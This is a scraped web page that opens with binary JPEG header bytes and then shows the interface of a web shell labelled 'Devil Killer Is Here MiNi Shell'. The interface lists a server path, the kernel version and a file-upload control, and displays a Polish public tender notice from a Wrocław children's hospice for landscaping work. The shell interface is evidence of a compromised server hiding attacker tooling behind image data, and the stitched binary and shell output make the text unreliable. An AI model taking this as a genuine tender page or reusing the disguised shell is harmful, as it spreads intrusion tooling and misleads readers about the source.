JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230428/0019935301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa domu opieki wyręczającej przy wrocławskim hospicjum dla dzieci” <br/>- zagospodarowanie terenu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">FUNDACJA &#34;WROCŁAWSKIE HOSPICJUM DLA DZIECI&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020598370</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jedności Narodowej 47/47A/49A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-260</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 367 51 09</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">beata.hernik@hospicjum.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://hospicjum.wroc.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> fundacja </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa domu opieki wyręczającej przy wrocławskim hospicjum dla dzieci” <br/>- zagospodarowanie terenu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8a616986-e5e3-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00199353</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/hospicjum_wroc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/hospicjum_wroc</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/hospicjum_wroc<br/>2. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>3. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>4. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>5. Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>6. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>7. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>8. Szczegółowa Instrukcja dla wykonawców platformazakupowa.pl dotycząca złożenia, zmiany i wycofania oferty, oraz informacji o<br/>wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej - stanowi załącznik<br/>nr 13 do SWZ.<br/>9. Dodatkowe informacje zawarte są w rozdziale X SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>• administratorem Pani/Pana danych osobowych jest Fundacja Wrocławskie Hospicjum dla Dzieci<br/>ul. Jedności Narodowej 47/47a/49a, 50-260 Wrocław, NIP: 8942923364, REGON: 020598370, tel.: 71 367 51 09, adres e-mail:<br/>fundacja@hospicjum.wroc.pl,<br/>• dane kontaktowe inspektora ochrony danych osobowych Marta Bałchanowska, tel. 602 499 289,<br/>kancelaria.balchanowska@gmail.com,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy Pzp, z tym, że udostępnienie danych, o których mowa w art. 10 RODO, może nastąpić<br/>w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w Dziale IX ustawy Pzp, do upływu terminu na ich<br/>wniesienie,<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia,<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO,<br/>• posiada Pani/Pan:<br/>– na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących ,<br/>– na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ,<br/>– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ,<br/>– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>• nie przysługuje Pani/Panu:<br/>– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>– prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Budowa domu opieki wyręczającej przy wrocławskim hospicjum dla dzieci” –<br/>zagospodarowanie terenu.<br/>2. Przedmiot zamówienia nie został podzielony na części.<br/>3. Zakres zamówienia obejmuje wykonanie robót budowlanych związanych z zagospodarowaniem terenu oraz innych prac<br/>zewnętrznych, w tym:<br/>1) roboty drogowe, w tym:<br/> wykonanie zabezpieczenia tras kanalizacji deszczowej z płyt wielootworowych,<br/> wykonanie chodników dla pieszych z kostki niefazowanej,<br/> wykonanie podłoża pod wiatę śmietnikową,<br/> wykonanie podłoża i nawierzchni bezpiecznej pod plac zabaw,<br/> wykonanie nawierzchni antypoślizgowych mrozoodpornych przed drzwiami tarasowymi na parterze,<br/> wykonanie drogi wewnętrznej,<br/> wykonanie opasek żwirowych wzdłuż budynku,<br/> wykonanie odwodnienia liniowego parkingu,<br/> wykonanie muru w podcieniu (roboty budowlane towarzyszące),<br/> wykonanie znakowania poziomego i pionowego w tym miejsc postojowych, stanowiska dla osób z niepełnosprawnością.<br/>2) roboty terenowe w tym:<br/> wykonanie ogrodzenia ulicznego w tym bramy rozwieranej i furtki wejściowej,<br/> wykonanie kontroli dostępu bramy i furtki wejściowej,<br/> wykonanie kanalizacji teletechnicznej pod przyszłą rozbudowę,<br/> wykonanie zewnętrznego panelowego ogrodzenia terenu,<br/> wykonanie wewnętrznego ogrodzenia panelowego terenu i ogrodzenia urządzeń pompowni, w tym furtki wejściowe – 2 szt.,<br/> prace porządkowe na terenie zewnętrznym,<br/> prace agrotechniczne - przygotowanie podłoża rozścielenie ziemi urodzajnej pod nasadzenia,<br/> wykonanie trawników,<br/> dostawa i sadzenie roślin,<br/> dostawa i montaż zewnętrznych krat do wycierania obuwia,<br/> dostawa i montaż stojaków na rowery,<br/> dostawa i montaż ławek miejskich,<br/> dostawa i montaż huśtawki koszowej,<br/> dostawa i montaż piaskownicy betonowej,<br/> dostawa i montaż wiaty śmietnikowej,<br/> dostawa zewnętrznego oświetlenia dekoracyjnego - lampy betonowe o wymiarach podstawy 10 x 10 cm (+/- 2cm) i<br/>wysokości 70cm (+/- 5cm, z dwustronną, szczelinową emisją światła,<br/> wykonanie i zasypanie wykopów (wykopy liniowe) pod instalację tego oświetlenia,<br/> wykonanie badań i pomiarów elektrycznych instalacji odgromowej<br/> dostawa i wykonanie systemu nawadniania - podlewania roślin i trawnika z podłączeniem do<br/>istniejącego/zamontowanego/wkopanego zbiornika na wodę deszczową o pojemności ok 10 m3), powierzchnia nasadzeń<br/>zgodnie z PZT,<br/> dostawa i instalacja beczki (do 500l) na deszczówkę z tarasu z wpięciem do kanalizacji deszczowej.<br/>4. Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji projektowej załączonej do SWZ:<br/>a. Projekt budowlany – Załącznik nr 8<br/>b. Pozwolenie na budowę – Załącznik nr 9<br/>c. Projekt wykonawczy w branżach objętych zamówieniem – Załącznik nr 10<br/>d. Specyfikacja techniczna wykonania i odbioru robót budowlanych w branżach objętych zamówieniem – Załącznik nr 11<br/>e. Przedmiary robót objętych zamówieniem – Załącznik nr 12<br/>f. Opis zakresu zamówienia – Załącznik nr 14 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45232121-6 - Roboty budowlane w zakresie rurociągów nawadniających</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">75 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą spośród ofert niepodlegających odrzuceniu na<br/>podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia.<br/>Kryteria oceny ofert określone przez Zamawiającego: cena ofertowa, okres gwarancji na roboty budowlane o okres gwarancji na<br/>nasadzenia roślin.<br/>A) Cena ofertowa (C) - waga 60%<br/>Oferta o najniższej cenie brutto uzyska w tym kryterium największą ilość punktów. Wykonawcom przyznana zostanie odpowiednio<br/>ilość punktów wyliczona wg wzoru:<br/>C = ( Cmin. : Cn ) x 60 pkt<br/>gdzie:<br/>C - ilość punktów n-tej ocenianej oferty brutto<br/>Cmin. - najniższa cena oferty brutto<br/>Cn - cena badanej n-tej oferty brutto<br/>Wartość punktowa obliczona zostanie z dokładnością do 2 miejsc po przecinku.<br/>Ceny w ofercie należy podać w złotych polskich z uwzględnieniem podatku od towarów i usług VAT.<br/>B) Okres gwarancji na roboty budowlane (G) – waga 30%<br/>Punktacja w tym kryterium zostanie przyznana za zaoferowanie dłuższego od wymaganego postanowieniami niniejszej SWZ okresu<br/>gwarancji na objęte przedmiotem zamówienia roboty budowlane i materiały (z wyłączeniem nasadzeń roślin). Wykonawca podaje w<br/>„Formularzu oferty” oferowany okres gwarancji na objęte przedmiotem zamówienia roboty budowlane i materiały. Wymagany przez Zamawiającego minimalny okres gwarancji wynosi 60 miesięcy na objęte przedmiotem zamówienia roboty budowlane i materiały.<br/>Punkty w kryterium „Okres gwarancji na roboty budowlane” przyznane zostaną za przedłużenie okresu gwarancji na objęte<br/>przedmiotem zamówienia roboty budowlane i materiały powyżej okresu wymaganego przez Zamawiającego.<br/>Za zaoferowanie minimalnego okresu gwarancji wynoszącego 60 miesięcy zamawiający przyzna 0 pkt.<br/>Za każde dodatkowe pełne 6 miesięcy gwarancji powyżej wymaganego okresu 60 miesięcy Zamawiający przyzna 15 pkt.<br/>Maksymalny punktowany okres gwarancji to 72 miesiące.<br/>Maksymalna liczba punktów w ramach kryterium „okres gwarancji na roboty budowlane” wynosi 30.<br/>Jeśli Wykonawca nie wskaże w „Formularzu oferty” oferowanego okresu gwarancji Zamawiający przyjmie, iż Wykonawca zaoferował<br/>minimalny okres gwarancji wynoszący 60 miesięcy.<br/>Zaoferowanie okresu gwarancji krótszego niż 60 miesięcy skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5)<br/>ustawy Pzp.<br/>C) Okres gwarancji na nasadzenia roślin (R) – waga 10%<br/>Punktacja w tym kryterium zostanie przyznana za zaoferowanie dłuższego od wymaganego postanowieniami niniejszej SWZ okresu<br/>gwarancji na objęte przedmiotem zamówienia nasadzenia roślin. Wykonawca podaje w „Formularzu oferty” oferowany okres<br/>gwarancji na objęte przedmiotem zamówienia nasadzenia roślin. Wymagany przez Zamawiającego minimalny okres gwarancji<br/>wynosi 12 miesięcy na objęte przedmiotem zamówienia nasadzenia roślin. Punkty w kryterium „Okres gwarancji na nasadzenia<br/>roślin” przyznane zostaną za przedłużenie okresu gwarancji na objęte przedmiotem zamówienia nasadzenia roślin powyżej okresu<br/>wymaganego przez Zamawiającego.<br/>Za zaoferowanie minimalnego okresu gwarancji wynoszącego 12 miesięcy zamawiający przyzna 0 pkt.<br/>Za każde dodatkowe pełne 12 miesięcy gwarancji powyżej wymaganego okresu 12 miesięcy Zamawiający przyzna 10 pkt.<br/>Maksymalny punktowany okres gwarancji to 24 miesiące.<br/>Maksymalna liczba punktów w ramach kryterium „okres gwarancji na nasadzenia roślin” wynosi 10.<br/>Jeśli Wykonawca nie wskaże w „Formularzu oferty” oferowanego okresu gwarancji Zamawiający przyjmie, iż Wykonawca zaoferował<br/>minimalny okres gwarancji wynoszący 12 miesięcy.<br/>Zaoferowanie okresu gwarancji krótszego niż 12 miesięcy skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5)<br/>ustawy Pzp.<br/>ŁĄCZNA PUNKTACJA OFERTY (S) zostanie obliczona z dokładnością do dwóch miejsc po przecinku w następujący sposób:<br/>S = C + G + R<br/>Zamawiający za najkorzystniejszą uzna ofertę, która uzyska najwyższą łączną liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na roboty budowlane (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na nasadzenia roślin (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1) i 4) ustawy Pzp oraz na podstawie art. 7<br/>ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>2. spełniają warunki udziału w postępowaniu dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczególnego sposobu spełniania przedmiotowego warunku.<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z 